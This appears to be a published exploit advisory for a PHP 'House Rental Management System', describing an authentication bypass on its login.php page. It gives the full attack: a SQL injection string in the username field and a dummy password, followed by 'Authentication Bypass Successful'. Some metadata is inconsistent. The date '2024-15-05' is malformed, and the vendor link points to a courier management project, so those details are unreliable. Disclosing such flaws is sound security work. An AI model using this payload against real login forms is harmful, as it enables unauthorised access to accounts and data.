- Exploit Title: House Rental Management System - Authentication Bypass
- Date: 2024-15-05
- Exploit Author: Burak Sevben
- Vendor Homepage: https://www.sourcecodester.com/php/17375/best-courier-management-system-project-php.html
- Software Link: https://www.sourcecodester.com/download-code?nid=17375&title=Best+house+rental+management+system+project+in+php+
- Version: Latest
- Tested on: Kali Linux + PHP 8.2.12, Apache 2.4.58
- CVE: Reported, waiting for CVE number.
House Rental Management System allows Authentication Bypass via the username and password parameters at "http://localhost/rental/login.php".
- Go to this address: "http://localhost/rental/login.php"
- username :
'or 1=1-- -password :1and log in - Authentication Bypass Successful !
